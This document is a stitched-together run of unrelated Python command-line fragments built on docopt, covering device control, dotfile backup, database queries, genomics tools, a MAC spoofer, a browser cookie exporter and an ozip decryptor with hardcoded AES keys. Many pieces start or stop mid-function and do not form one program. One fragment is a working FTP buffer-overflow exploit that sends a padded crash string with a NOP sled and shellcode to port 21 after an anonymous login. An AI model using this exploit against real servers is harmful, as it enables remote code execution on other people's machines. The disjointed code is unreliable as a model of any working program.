    # only 'status' (and --all) may operate on more than one device
    if len(selected) > 1 and not (args['status'] or args['all']):
        raise SystemExit(
            'Error: too many devices, filter or select one (see: liquidctl --help)'
        )
    elif len(selected) == 0:
        raise SystemExit(
            'Error: no devices matches available drivers and selection criteria'
        )

    errors = 0

    def log_error(err, msg, *args):
        # count the failure, keep the stack trace at INFO, surface msg at ERROR
        nonlocal errors
        errors += 1
        _LOGGER.info('%s', err, exc_info=True)
        _LOGGER.error(msg, *args)

    for dev in selected:
        _LOGGER.debug('device: %s', dev.description)
        try:
            dev.connect(**opts)
            if args['initialize']:
                _print_dev_status(dev, dev.initialize(**opts))
            elif args['status']:
                _print_dev_status(dev, dev.get_status(**opts))
            elif args['set'] and args['speed']:
                _device_set_speed(dev, args, **opts)
            elif args['set'] and args['color']:
                _device_set_color(dev, args, **opts)
            else:
                raise Exception('Not sure what to do')
        except OSError as err:
            # each backend API returns a different subtype of OSError (OSError,
            # usb.core.USBError or PermissionError) for permission issues
            if err.errno in [errno.EACCES, errno.EPERM]:
                log_error(
                    err,
                    f'Error: insufficient permissions to access {dev.description}'
                )
            elif err.args == ('open failed', ):
                log_error(
                    err,
                    f'Error: could not open {dev.description}, possibly due to insufficient permissions'
                )
            else:
                log_error(
                    err, f'Unexpected OS error with {dev.description}: {err}')
        except NotSupportedByDevice as err:
            log_error(err,
                      f'Error: operation not supported by {dev.description}')
        except NotSupportedByDriver as err:
            log_error(
                err,
                f'Error: operation not supported by driver for {dev.description}'
            )
        except UnsafeFeaturesNotEnabled as err:
            features = ','.join(err.args)
            log_error(
                err,
                f'Error: missing --unsafe features for {dev.description}: {features!r}'
            )
            _LOGGER.error(
                'More information is provided in the corresponding device guide'
            )
        except Exception as err:
            log_error(err, f'Unexpected error with {dev.description}: {err}')
        finally:
            # always release the device, even after a failure
            dev.disconnect(**opts)

    if errors:
        sys.exit(errors)
Options: --help Shows this help message. """ from __future__ import print_function from __future__ import absolute_import from __future__ import unicode_literals from docopt import docopt import struct import ctypes from newton_control_main import newton as newton if __name__ == "__main__": args = docopt(__doc__, version='0.1') address = int( args['<address>'], 16 ) write_data = int( args['<write_data>'], 16 ) rc = newton.adi_newton_config( 0 ) if rc != 0: print( "ERROR: newton.adi_newton_config return an error (" + str( rc ) + ")." ) sys.exit( rc ) newton.adi_write_register( address, write_data ) read_data = newton.adi_read_register_py( address ) if read_data != write_data: print( "ERROR: miscompare: actual = " + hex( read_data ) + " , expected = " + hex ( write_data ) )
if not root_or_admin: if sys.platform == 'win32': print('Error: Must run this with administrative privileges to set MAC addresses') return NON_ROOT_USER else: print('Error: Must run this as root (or with sudo) to set MAC addresses') return NON_ROOT_USER set_interface_mac(device, target_mac, port) elif args['normalize']: print(normalize_mac_address(args['<mac>'])) else: print('Error: Invalid arguments - check help usage') return INVALID_ARGS del spoofer return SUCCESS if __name__ == '__main__': arguments = docopt(__doc__, version=1.0) try: root_or_admin = os.geteuid() == 0 except AttributeError: root_or_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 sys.exit(main(arguments, root_or_admin))
'groupid': row[0], 'taxid': taxid }) if rv: hom_ct += 1 else: dba_err_ct += 1 pbar.finish() print "Processed {} lines.".format(ct) print "Loaded {} new homologene rows".format(hom_ct) print " Skipped {} non-Human/Mouse/Rat lines".format(skip_ct) if nf_ct > 0: print "WARNNING: No target/nhprotein found for {} lines. See logfile {} for details.".format( nf_ct, logfile) if dba_err_ct > 0: print "WARNNING: {} DB errors occurred. See logfile {} for details.".format( dba_err_ct, logfile) if __name__ == '__main__': print "\n{} (v{}) [{}]:".format(PROGRAM, __version__, time.strftime("%c")) args = docopt(__doc__, version=__version__) if args['--debug']: print "\n[*DEBUG*] ARGS:\n%s\n" % repr(args) start_time = time.time() download(args) load(args) elapsed = time.time() - start_time print "\n{}: Done. Elapsed time: {}\n".format(PROGRAM, slmf.secs2str(elapsed))
from docopt import docopt
from openeye.oechem import *
from openeye.oeomega import *
from openeye.oequacpac import *
from tqdm import tqdm

# docopt usage string for this script
cmd_str = """Usage:
gen_restricted_confs.py --smi SMILES_FILE --fix FIX_FILE --out OUTPUT_FILE

Options:
--smi SMILES_FILE input SMILES file name
--fix FIX_FILE file_with_fixed piece of the molecule
--out OUTPUT_FILE output file name
"""

cmd_input = docopt(cmd_str)
smiles_file_name = cmd_input.get("--smi")
fix_file_name = cmd_input.get("--fix")
output_file_name = cmd_input.get("--out")

# read the fixed substructure that generated conformers must preserve
fix_mol = OEGraphMol()
fix_fs = oemolistream(fix_file_name)
OEReadMolecule(fix_fs, fix_mol)

# Relatively quick way to get the number of molecules
moldb = oechem.OEMolDatabase()
moldb.Open(smiles_file_name)
num_mols = moldb.NumMols()

# constrain Omega conformer generation to keep fix_mol rigid
omegaOpts = OEOmegaOptions()
omegaOpts.SetFixMol(fix_mol)
ret = struct.pack('<L', 0x7C874413) padding = "\x90" * 150 crash = "\x41" * 246 + ret + padding + shellcode print "[+] Connecting to " + target s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target, 21)) except: print Fore.RED + "[-] Connection to " + target + " failed!" + Fore.RESET sys.exit(0) print "[+] Attempting anonymous login" s.send("USER anonymous\r\n") s.recv(1024) s.send("PASS \r\n") s.recv(1024) print "[+] Sending " + 'len(crash)' + " " + command + " byte crash..." s.send(command + " " + crash + "\r\n") time.sleep(4) print Fore.GREEN + "[*] Command sent!" + Fore.RESET if __name__ == '__main__': init() arguments = docopt(__doc__, version=0.1) main(arguments)
'''rHockey Ticker

Usage:
  rHockey.py [--limit=<number>] [--delay=<minutes>]
  rHockey.py feed <name> [--limit=<number>] [--delay=<minutes>]

Options:
  -h --help          Show this screen.
  --limit=<number>   Limit for submission downloads
  --delay=<minutes>  Delay to wait between downloads in minutes

'''
import ticker
from docopt import docopt

if __name__ == '__main__':
    #import ipdb; ipdb.set_trace()
    arguments = docopt(__doc__, version=u'rHockey Ticker 0.1')
    # default to the subreddit's 'new' feed when no <name> is given
    feed = arguments['<name>'] or u'new'
    # both knobs default to 5 when the options are omitted
    delay = int(arguments['--delay'] or 5)
    limit = int(arguments['--limit'] or 5)
    ticker.ticker_runner('hockey', feed, delay=delay, limit=limit)
def main():
    """entry point: parse args, load the config, and dispatch the selected
    dotdrop sub-command; returns False on error, True otherwise."""
    ret = True
    args = docopt(USAGE, version=VERSION)
    try:
        conf = Cfg(os.path.expanduser(args['--cfg']))
    except ValueError as e:
        LOG.err('error: {}'.format(str(e)))
        return False
    # fold CLI flags into the settings loaded from the config file
    opts = conf.get_settings()
    opts['dry'] = args['--dry']
    opts['profile'] = args['--profile']
    opts['safe'] = not args['--force']
    opts['installdiff'] = not args['--nodiff']
    opts['link'] = args['--link']
    opts['debug'] = args['--verbose']
    LOG.debug = opts['debug']
    LOG.dbg('config file: {}'.format(args['--cfg']))
    LOG.dbg('opts: {}'.format(opts))
    if opts['banner'] and not args['--no-banner']:
        header()
    try:
        if args['list']:
            # list existing profiles
            list_profiles(conf)
        elif args['listfiles']:
            # list files for selected profile
            list_files(opts, conf)
        elif args['install']:
            # install the dotfiles stored in dotdrop
            ret = install(opts, conf)
        elif args['compare']:
            # compare local dotfiles with dotfiles stored in dotdrop
            tmp = get_tmpdir()
            opts['dopts'] = args['--dopts']
            ret = compare(opts, conf, tmp, args['--files'])
            # keep the tmp dir only if the comparison produced files
            if os.listdir(tmp):
                LOG.raw('\ntemporary files available under {}'.format(tmp))
            else:
                os.rmdir(tmp)
        elif args['import']:
            # import dotfile(s)
            importer(opts, conf, args['<paths>'])
        elif args['update']:
            # update a dotfile
            update(opts, conf, args['<path>'])
    except KeyboardInterrupt:
        LOG.err('interrupted')
        ret = False
    return ret
import sys
import os
from docopt import docopt

# Command-line interface. NOTE: the original declared
# `[default: "camera"]`, which made docopt hand back the literal string
# '"camera"' (quotes included) as the window title; the quotes are dropped
# here so the default title is just `camera`.
doc = """
Usage:
    emotions <pred_file> [-s=<video_source>] [-o=<output_video>] [-l=<labeled_video>] [-w=<window_title>]

Options:
    -s <video_source>       video file source [default: 0]
    -o <output_video>       output video file name without file extension (file will be saved as .avi)
    -l <labeled-video>      labeled output video file name without file extension (file will be saved as .avi)
    -w <window_title>       title of window [default: camera]
"""

args = docopt(doc=doc, argv=sys.argv[1:])

# Window title; the `or` keeps a sane fallback should the default ever be removed.
WINDOW_NAME = args['-w'] or "camera"
# Path to the trained predictor handed to the rest of the program.
PRED_FILE = args['<pred_file>']

# A purely numeric source selects a capture device index, anything else
# is treated as a path to a video file that must exist.
VIDEO_SOURCE = args['-s']
if VIDEO_SOURCE.isdigit():
    VIDEO_SOURCE = int(VIDEO_SOURCE)
else:
    if not os.path.isfile(VIDEO_SOURCE):
        print("video source file '{}' does not exist.".format(VIDEO_SOURCE))
        # BUG FIX: exit() without a status reported success (0) on this
        # error path; exit non-zero instead.
        sys.exit(1)

OUTPUT_VIDEO_FILE = args['-o']
LABELED_VIDEO_FILE = args['-l']
def main(debug=None):
    """Blast sequences against a reference and (optionally) check the calls
    against a VCF, printing one tab-separated line per reported variant.

    Args:
        debug: optional argv list forwarded to docopt (None = real CLI).
    """
    args = docopt(__doc__,
                  version='VCF-Toolbox v0.1',
                  argv=debug,
                  options_first=False)
    module_path = os.path.split(os.path.realpath(__file__))[0]
    handle = open(args["<seq>"], "rb")
    reference = resolve_reference_genome(args["--ref"])

    # When a VCF is supplied, run in concordance mode and keep its samples.
    if args["<vcf>"]:
        concordance = True
        v = vcf(args["<vcf>"])
        samples = v.samples

    # --vcf-sites only makes sense together with a VCF.
    if args["--vcf-sites"] and args["<vcf>"] is None:
        with indent(4):
            exit(
                puts_err(
                    colored.red("\nMust specify <vcf> with --vcf-sites\n")))

    # Setup reference for blast call
    b = blast(reference)

    # Set file type:
    sequence_file_type = seq_type(args["<seq>"])

    # Output header
    print("\t".join(blast_variant.output_order))

    for record in SeqIO.parse(handle, sequence_file_type):
        # Resolve sample within fasta line; fall back to the record name.
        # NOTE(review): `samples` is only bound when <vcf> was given — this
        # presumably relies on concordance mode; confirm against callers.
        sample = resolve_sample_from_line(samples, handle.name)
        if not sample:
            sample = resolve_sample_from_line(samples, record.name)
        blast_results = b.blast_call(record)
        classification = ""
        for n, variant in enumerate(blast_results):
            output_line = False
            if variant is None:
                puts_err(
                    colored.red("No Results for " + sample + " " +
                                record.description))
                continue
            if args["<vcf>"]:
                # Collect the VCF calls overlapping this blast region once,
                # on the first variant of the record.
                if n == 0:
                    vcf_variants = []
                    for vcf_variant in v(variant.region()):
                        if sample:
                            gt = format_gt(
                                vcf_variant.gt_bases[v.samples.index(sample)])
                            vcf_variants.append([
                                vcf_variant.CHROM, vcf_variant.POS, gt,
                                vcf_variant.REF, vcf_variant.ALT
                            ])
                    vcf_variant_positions = [x[0:2] for x in vcf_variants]

                # Match the blast call to a VCF call by (CHROM, POS).
                chrom_pos = variant.chrom_pos_allele()[0:2]
                vcf_variant_match = [
                    x for x in vcf_variants if x[0:2] == chrom_pos
                ]
                if vcf_variant_match:
                    vcf_variant_match = vcf_variant_match[0]
                    variant.vcf_gt = vcf_variant_match[2]
                    variant.REF = vcf_variant_match[3]
                    variant.ALT = ','.join(vcf_variant_match[4])
                    variant.fetch_variant_type()
                    # Concordance classification: compare reference, the
                    # genotype seen in the sequence, and the VCF genotype.
                    if variant.REF == variant.seq_gt and variant.seq_gt == variant.vcf_gt:
                        variant.classification = "TN"
                    elif variant.REF != variant.seq_gt and variant.seq_gt == variant.vcf_gt:
                        variant.classification = "TP"
                    elif variant.REF == variant.seq_gt and variant.seq_gt != variant.vcf_gt:
                        variant.classification = "FP"
                    elif variant.REF != variant.seq_gt and variant.seq_gt != variant.vcf_gt:
                        variant.classification = "FN"
                else:
                    # No VCF call at this site: leave the call unclassified.
                    variant.REF = ""
                    variant.ALT = ""
                    variant.fetch_variant_type()
                    variant.classification = ""
                if args["--vcf-sites"] and variant.classification != "":
                    output_line = True
                elif args["--all-sites"] is True:
                    output_line = True
            else:
                # No VCF: emit everything with --all-sites, else variants only.
                if args["--all-sites"]:
                    output_line = True
                elif variant.is_variant:
                    output_line = True
            if output_line:
                variant.sample = sample
                if record.description:
                    variant.description = record.description
                else:
                    variant.description = os.path.split(handle.name)[1]
                # NOTE(review): Python 2 print statement — this file mixes
                # print() calls and print statements.
                print '\t'.join([str(variant)])
# names to use for json files storing input matrices
default_names = ['a.arr', 'b.arr', 'c.arr']


def create_matrix(spec):
    """Return a random matrix described by *spec*.

    Args:
        spec: dict with a required 'shape' (sequence of ints) and optional
            scale 'a' (default 1.0) and offset 'b' (default 0.0).

    Returns:
        numpy.ndarray of the requested shape with values uniformly drawn
        from [b, a + b).
    """
    shape = spec['shape']
    # dict.get() replaces the original conditional-expression lookups.
    a = spec.get('a', 1.0)
    b = spec.get('b', 0.0)
    return (a * np.random.random_sample(shape)) + b


if __name__ == '__main__':
    arguments = docopt(__doc__, version='JSON Matrix Generator')
    base_directory = os.path.join(arguments['<directory>'], '')
    test_file = arguments['<spec.json>']
    # The operation module is looked up inside the target directory.
    sys.path.insert(0, './' + base_directory)
    operation = __import__("operation")
    with open(test_file, 'r') as f:
        try:
            tests = json.load(f)
        except Exception as e:
            # BUG FIX: Exception.message does not exist on Python 3; format
            # the exception object itself instead.
            print("Couldn't parse JSON configuration file: {0}".format(e))
            sys.exit(1)
def main():
    """Parse the command-line options and hand them to ``helper``."""
    opts = docopt(docs, version=__version__)
    helper(foo=opts['--foo'], bar=opts['--bar'])
        # Tail of firefox_cookies(): bail out with an empty dict when the
        # session file is missing.
        print('Firefox session filename does not exist:%s' % path)
        return {}
    if path is None:
        path = find_cookie_file()
    # Session cookies live next to the cookie DB in sessionstore.js.
    session_path = os.path.join(os.path.dirname(path), 'sessionstore.js')
    domain = urllib.parse.urlparse(url).netloc
    cookie = load(path, domain)
    session_cookie = load_session(session_path, domain)
    # Session cookies override persisted ones on key collision.
    cookie.update(session_cookie)
    return cookie


if __name__ == '__main__':
    from docopt import docopt
    doc = """
export given url's cookie, format only supports "chrome" and "firefox".
if path is "-" then use default cookie. output format is json

Usage:
    cookie_export.py <dst> <src> <format> <url>
"""
    args = docopt(doc, version="cookie_cheat v1.0")
    # "-" means: use the browser's default cookie path.
    src = None if args["<src>"] == "-" else args["<src>"]
    if args["<format>"] == "chrome":
        cookie = chrome_cookies(args["<url>"], src)
    elif args["<format>"] == "firefox":
        cookie = firefox_cookies(args["<url>"], src)
    # NOTE(review): an unsupported <format> leaves `cookie` unbound and the
    # open() below raises NameError — confirm intended behaviour.
    with open(args["<dst>"], "w") as fo:
        json.dump(cookie, fo)
#!/usr/bin/env python3 # (c) B. Kerler 2017-2020, licensed under MIT license """ Usage: ozipdecrypt.py --help ozipdecrypt.py <filename> Options: Mode 1 for regular ozip, Mode 2 for CPH1803/CPH1909 [default: 1] """ from docopt import docopt args = docopt(__doc__, version='1.2') import os import sys, stat import shutil import binascii from Crypto.Cipher import AES from zipfile import ZipFile keys = [ "D6EECF0AE5ACD4E0E9FE522DE7CE381E", # mnkey "D6ECCF0AE5ACD4E0E92E522DE7C1381E", # mkey "D6DCCF0AD5ACD4E0292E522DB7C1381E", # realkey, R9s CPH1607 MSM8953, Plus, R11, RMX1921 Realme XT, RMX1851EX Realme Android 10, RMX1992EX_11_OTA_1050 "D7DCCE1AD4AFDCE2393E5161CBDC4321", # testkey "D7DBCE2AD4ADDCE1393E5521CBDC4321", # utilkey "D7DBCE1AD4AFDCE1393E5121CBDC4321", # R11s CPH1719 MSM8976, Plus "D4D2CD61D4AFDCE13B5E01221BD14D20", # FindX CPH1871 SDM845 "261CC7131D7C1481294E532DB752381E", # FindX
def main(wf):
    """Run Script Filter.

    Dispatches the --open* flag actions, delegates delimited queries, and
    otherwise presents a filterable list of workflow options.

    Args:
        wf (workflow.Workflow): Workflow object.
    """
    args = docopt(__doc__, wf.args)
    log.debug('args : {!r}'.format(args))

    query = args.get('<query>')

    bootstrap(wf)

    # Alternative actions ----------------------------------------------
    # Each --open* flag shells out to `open` and returns immediately.
    if args.get('--openapi'):
        subprocess.call(['open', SIGNUP_URL])
        return
    if args.get('--openhelp'):
        subprocess.call(['open', README_URL])
        return
    if args.get('--openunits'):
        path = wf.datafile(CUSTOM_DEFINITIONS_FILENAME)
        subprocess.call(['open', path])
        return
    if args.get('--openactive'):
        path = wf.datafile(ACTIVE_CURRENCIES_FILENAME)
        subprocess.call(['open', path])
        return

    # Parse query ------------------------------------------------------
    # A delimiter in the query means a conversion request; hand it off.
    if DELIMITER in query:
        return handle_delimited_query(query)

    # Filter options ---------------------------------------------------
    query = query.strip()

    # Static menu entries; `arg` round-trips back into the --open* flags.
    options = [
        dict(title='View Help File',
             subtitle='Open help file in your browser',
             valid=True,
             arg='--openhelp',
             icon=ICON_HELP),
        dict(title='View All Supported Currencies',
             subtitle='View and search list of supported currencies',
             autocomplete=u'currencies {} '.format(DELIMITER),
             icon=ICON_CURRENCY),
        dict(title='Edit Active Currencies',
             subtitle='Edit the list of active currencies',
             valid=True,
             arg='--openactive',
             icon='icon.png'),
        dict(title='Edit Custom Units',
             subtitle='Add and edit your own custom units',
             valid=True,
             arg='--openunits',
             icon='icon.png'),
        dict(title='Get API key',
             subtitle='Sign up for free openexchangerates.org account',
             valid=True,
             arg='--openapi',
             icon=ICON_WEB),
    ]

    # Fuzzy-filter the menu by title when the user typed something.
    if query:
        options = wf.filter(query, options, key=lambda d: d['title'],
                            min_score=30)
    if not options:
        wf.add_item('No matching options',
                    'Try a different query?',
                    icon=ICON_WARNING)

    for d in options:
        wf.add_item(**d)

    wf.send_feedback()
    return
""" Usage: cat_jsonl <input> <line>... Options: --verbose """ import json import docopt if __name__ == '__main__': argv = docopt.docopt(__doc__) lines = [int(i) for i in argv['<line>']] with open(argv['<input>']) as fp: for i, line in enumerate(fp): if i in line: obj = json.loads(line) print(json.dumps(obj, indent=2))
    # Tail of the URL dispatcher: volume-list pages get grab_booklist(),
    # anything unrecognised prints a usage hint (message intentionally
    # left in Chinese — it is a runtime string).
    elif check_result == 'vollist':
        grab_booklist(url, output_dir, cover_path)
    else:
        print(
            '请输入正确的网址,例如:\nhttp://lknovel.lightnovel.cn/main/vollist/492.html'
            '\nhttp://lknovel.lightnovel.cn/main/book/1578.html')


def main():
    """Collect URLs and options (from argv or interactively) and start
    the download via start()."""
    global SINGLE_THREAD
    if len(sys.argv) > 1:
        # CLI mode: `arguments` is the module-level docopt dict set in the
        # __main__ guard below.
        urls = arguments['<url>']
        SINGLE_THREAD = arguments['-s']
        output_dir = None if not arguments['--output'] else arguments[
            '--output'][0]
        cover_path = None if not arguments['--cover'] else arguments[
            '--cover'][0]
    else:
        # Interactive mode: prompt for URLs and the threading preference.
        urls = input('Please input urls(separate with space):').split()
        if is_single_thread():
            SINGLE_THREAD = True
        output_dir = None
        cover_path = None
    start(urls, output_dir, cover_path)


if __name__ == '__main__':
    arguments = docopt(__doc__, version='Lknovel 1.0')
    sys.exit(main())
            # Tail of an interactive command evaluator (Python 2):
            # statements go through exec(), expressions are eval()'d and
            # echoed; any failure is printed and swallowed.
            exec(cmd)
        else:
            print eval(cmd)
            print ''
    except Exception, e:
        print e
    # evalcmd(dir_mo)
    # break


if __name__ == "__main__":
    # parsehtml(downloadpage(url_s))
    # StreamHandler(sys.stdout).push_application()
    # log = LoggerFactory.getLogger('SinaMarketNew')
    from docopt import docopt
    log = LoggerFactory.log
    args = docopt(cct.sina_doc, version='sina_cxdn')
    # print args,args['-d']
    # Map the -d option onto a log level; anything unrecognised → ERROR.
    if args['-d'] == 'debug':
        log_level = LoggerFactory.DEBUG
    elif args['-d'] == 'info':
        log_level = LoggerFactory.INFO
    else:
        log_level = LoggerFactory.ERROR
    # log_level = LoggerFactory.DEBUG if args['-d'] else LoggerFactory.ERROR
    log.setLevel(log_level)
    # log.setLevel(LoggerFactory.DEBUG)
    # handler=StderrHandler(format_string='{record.channel}: {record.message) [{record.extra[cwd]}]')
    # log.level = log.debug
    # error_handler = SyslogHandler('Sina-M-Log', level='ERROR')
def main():
    """Main function.

    Parses the CLI and dispatches to the backup / restore / uninstall /
    list / show subcommands, then removes the temporary folder.
    """
    # Get the command line arg
    args = docopt(__doc__, version="Mackup {}".format(VERSION))
    mckp = Mackup()
    app_db = ApplicationsDatabase()

    def printAppHeader(app_name):
        # NOTE(review): reads the enclosing `verbose`, which is assigned a
        # few lines below — fine for every call site here, but the helper
        # must not be invoked before that assignment.
        if verbose:
            print(("\n{0} {1} {0}").format(header("---"), bold(app_name)))

    # If we want to answer mackup with "no" for each question
    if args['--force']:
        utils.FORCE_NO = True

    dry_run = args["--dry-run"]
    verbose = args["--verbose"]

    if args["backup"]:
        # Check the env where the command is being run
        mckp.check_for_usable_backup_env()

        # Backup each application
        for app_name in sorted(mckp.get_apps_to_backup()):
            app = ApplicationProfile(mckp, app_db.get_files(app_name),
                                     dry_run, verbose)
            printAppHeader(app_name)
            app.backup()

    elif args["restore"]:
        # Check the env where the command is being run
        mckp.check_for_usable_restore_env()

        # Restore the Mackup config before any other config, as we might need
        # it to know about custom settings
        mackup_app = ApplicationProfile(mckp,
                                        app_db.get_files(MACKUP_APP_NAME),
                                        dry_run, verbose)
        printAppHeader(MACKUP_APP_NAME)
        mackup_app.restore()

        # Initialize again the apps db, as the Mackup config might have changed
        # it
        mckp = Mackup()
        app_db = ApplicationsDatabase()

        # Restore the rest of the app configs, using the restored Mackup config
        app_names = mckp.get_apps_to_backup()
        # Mackup has already been done
        app_names.discard(MACKUP_APP_NAME)

        for app_name in sorted(app_names):
            app = ApplicationProfile(mckp, app_db.get_files(app_name),
                                     dry_run, verbose)
            printAppHeader(app_name)
            app.restore()

    elif args["uninstall"]:
        # Check the env where the command is being run
        mckp.check_for_usable_restore_env()

        if dry_run or (utils.confirm(
                "You are going to uninstall Mackup.\n"
                "Every configuration file, setting and dotfile"
                " managed by Mackup will be unlinked and moved back"
                " to their original place, in your home folder.\n"
                "Are you sure ?")):

            # Uninstall the apps except Mackup, which we'll uninstall last, to
            # keep the settings as long as possible
            app_names = mckp.get_apps_to_backup()
            app_names.discard(MACKUP_APP_NAME)

            for app_name in sorted(app_names):
                app = ApplicationProfile(mckp, app_db.get_files(app_name),
                                         dry_run, verbose)
                printAppHeader(app_name)
                app.uninstall()

            # Restore the Mackup config before any other config, as we might
            # need it to know about custom settings
            mackup_app = ApplicationProfile(mckp,
                                            app_db.get_files(MACKUP_APP_NAME),
                                            dry_run, verbose)
            mackup_app.uninstall()

            # Delete the Mackup folder in Dropbox
            # Don't delete this as there might be other Macs that aren't
            # uninstalled yet
            # delete(mckp.mackup_folder)

            print("\n"
                  "All your files have been put back into place. You can now"
                  " safely uninstall Mackup.\n"
                  "\n"
                  "Thanks for using Mackup !")

    elif args["list"]:
        # Display the list of supported applications
        mckp.check_for_usable_environment()
        output = "Supported applications:\n"
        for app_name in sorted(app_db.get_app_names()):
            output += " - {}\n".format(app_name)
        output += "\n"
        output += "{} applications supported in Mackup v{}".format(
            len(app_db.get_app_names()), VERSION)
        print(output)

    elif args["show"]:
        mckp.check_for_usable_environment()
        app_name = args["<application>"]

        # Make sure the app exists
        if app_name not in app_db.get_app_names():
            sys.exit("Unsupported application: {}".format(app_name))
        print("Name: {}".format(app_db.get_name(app_name)))
        print("Configuration files:")
        for file in app_db.get_files(app_name):
            print(" - {}".format(file))

    # Delete the tmp folder
    mckp.clean_temp_folder()
        # Tail of copy_attachments(): ensure the destination exists, then
        # copy every page's attachment files across.
        os.makedirs(dest_dir)
    root = os.path.abspath(os.path.join(arguments['<data_dir>'], 'pages'))
    pages = os.listdir(root)
    # os.chdir(dest_dir)
    for page in pages:
        attachment_dir = os.path.join(root, page, 'attachments')
        # Pages without attachments are skipped.
        if not os.path.exists(attachment_dir):
            continue
        print("Copying attachments for %s" % page)
        # Page directory names are URL-quoted on disk.
        path = _unquote(page)
        dest_path = os.path.join(dest_dir, path)
        if not os.path.exists(dest_path):
            os.makedirs(dest_path)
        for f in os.listdir(attachment_dir):
            print(".. %s" % f)
            full_file_name = os.path.join(attachment_dir, f)
            shutil.copy(full_file_name, dest_path)


if __name__ == '__main__':
    arguments = docopt.docopt(__doc__, version=__version__)
    # Dispatch on the subcommand selected by docopt.
    if arguments['users']:
        print(json.dumps(parse_users(), sort_keys=True, indent=2))
    elif arguments['migrate']:
        migrate_to_git()
    elif arguments['attachments']:
        copy_attachments()
def main():
    """Entry point.

    Generates static blobtools plots for a BlobDir by shelling out to the
    `blobtools` CLI, renames the produced files, and on any failure removes
    the partial outputs and exits non-zero.
    """
    try:
        # parse_args()
        args = docopt(__doc__)
    except DocoptExit:
        # NOTE(review): re-raising a *new* DocoptExit discards the usage
        # message of the original; a bare `raise` would preserve it.
        raise DocoptExit
    blob_path = "%s/%s" % (args["--path"], args["--blobdir"])
    try:
        # One `blobtools view` invocation per plot type/shape.
        views = [
            "--view blob --param plotShape=circle --param largeFonts=true --format png",
            "--view blob --param plotShape=hex --param largeFonts=true --format png",
            "--view blob --param plotShape=square --param largeFonts=true --format png",
            "--view blob --param plotShape=kite --param largeFonts=true --format png",
            "--view cumulative --param largeFonts=true --format png",
            "--view snail --param largeFonts=true --format png",
        ]
        # Without coverage data only the cumulative and snail views apply.
        if not args["--coverage"]:
            views = views[4:]
        cmds = []
        for view in views:
            cmds.append(
                "blobtools view --host %s --timeout %s --ports %s %s --out %s/ %s"
                % (
                    args["--host"],
                    args["--timeout"],
                    args["--ports"],
                    view,
                    blob_path,
                    args["--blobdir"],
                ))
        cmds.append("blobtools filter --summary %s/%s.summary.json %s" %
                    (blob_path, args["--blobdir"], blob_path))
        cmds.append("blobtools add --key static_plots=true %s" % blob_path)
        for cmd in cmds:
            logger.info(cmd)
            # setsid puts each child in its own process group so a timeout
            # can signal the whole group.
            with subprocess.Popen(
                    shlex.split(cmd),
                    stdout=subprocess.PIPE,
                    preexec_fn=os.setsid,
                    encoding="utf-8",
            ) as process:
                try:
                    process.communicate(timeout=1800)[0]
                except subprocess.TimeoutExpired:
                    os.killpg(
                        process.pid,
                        signal.SIGINT)  # send signal to the process group
                    process.communicate()[0]
        # Strip the "<blobdir>." prefix (and any numeric component after it)
        # from the generated png/svg/json filenames.
        for filename in os.listdir(blob_path):
            p = Path("%s/%s" % (blob_path, filename))
            parts = filename.split(".")
            if filename.startswith(args["--blobdir"]):
                if (filename.endswith("png") or filename.endswith("svg")
                        or filename.endswith("json")):
                    if parts[1].isdigit():
                        parts = parts[2:]
                    else:
                        parts = parts[1:]
                    new_p = Path("%s/%s" % (
                        p.parent.as_posix(),
                        filename.replace("%s." % args["--blobdir"], ""),
                    ))
                    p.rename(new_p)
    except Exception as err:
        # On any failure: log, clean up partial outputs, exit non-zero.
        logger.error(err)
        for pngpath in glob.iglob(
                os.path.join(blob_path, "%s.*.png" % args["--blobdir"])):
            os.remove(pngpath)
        for svgpath in glob.iglob(
                os.path.join(blob_path, "%s.*.svg" % args["--blobdir"])):
            os.remove(svgpath)
        for jsonpath in glob.iglob(
                os.path.join(blob_path, "%s.*.json" % args["--blobdir"])):
            os.remove(jsonpath)
        exit(1)
def cli():
    """Command-line entry point: parse arguments, run the query against the
    database and print the result in the requested format.

    Exit codes: 62 unsupported format, 64 bad parameter syntax, 66 query
    not found, 60 missing optional package.
    """
    supported_formats = 'csv tsv json yaml html xls xlsx dbf latex ods'.split()
    formats_lst = ", ".join(supported_formats)
    cli_docs = """Records: SQL for Humans™
A Kenneth Reitz project.

Usage:
  records <query> [<format>] [<params>...] [--url=<url>]
  records (-h | --help)

Options:
  -h --help     Show this screen.
  --url=<url>   The database URL to use. Defaults to $DATABASE_URL.

Supported Formats:
   %(formats_lst)s

   Note: xls, xlsx, dbf, and ods formats are binary, and should only be
   used with redirected output e.g. '$ records sql xls > sql.xls'.

Query Parameters:
    Query parameters can be specified in key=value format, and injected
    into your query in :key format e.g.:

    $ records 'select * from repos where language ~= :lang' lang=python

Notes:
  - While you may specify a database connection string with --url, records
    will automatically default to the value of $DATABASE_URL, if available.
  - Query is intended to be the path of a SQL file, however a query string
    can be provided instead. Use this feature discernfully; it's dangerous.
  - Records is intended for report-style exports of database queries, and
    has not yet been optimized for extremely large data dumps.
""" % dict(formats_lst=formats_lst)

    # Parse the command-line arguments.
    arguments = docopt(cli_docs)

    query = arguments['<query>']
    params = arguments['<params>']

    # A <format> containing '=' is actually a key=value parameter that
    # docopt mis-assigned; move it over to <params>.
    format = arguments.get('<format>')
    if format and "=" in format:
        del arguments['<format>']
        arguments['<params>'].append(format)
        format = None
    if format and format not in supported_formats:
        print('%s format not supported.' % format)
        print('Supported formats are %s.' % formats_lst)
        exit(62)

    # Can't send an empty list if params aren't expected.
    try:
        params = dict([i.split('=') for i in params])
    except ValueError:
        print('Parameters must be given in key=value format.')
        exit(64)

    # Be ready to fail on missing packages
    try:
        # Create the Database.
        db = Database(arguments['--url'])

        # Execute the query, if it is a found file.
        if os.path.isfile(query):
            rows = db.query_file(query, **params)

        # Execute the query, if it appears to be a query string.
        elif len(query.split()) > 2:
            rows = db.query(query, **params)

        # Otherwise, say the file wasn't found.
        else:
            print('The given query could not be found.')
            exit(66)

        # Print results in desired format.
        if format:
            content = rows.export(format)
            # Binary formats are written raw so redirection works.
            if isinstance(content, bytes):
                print_bytes(content)
            else:
                print(content)
        else:
            print(rows.dataset)
    except ImportError as impexc:
        print(impexc.msg)
        print("Used database or format require a package, which is missing.")
        print("Try to install missing packages.")
        exit(60)
def main():
    """This is the main function that does the heavy-lifting.

    Reads event CSV files, preloads the referenced stimuli, waits for the
    scanner trigger, then presents each event at its onset while logging
    keypresses and giving audio feedback on oddity trials.
    """
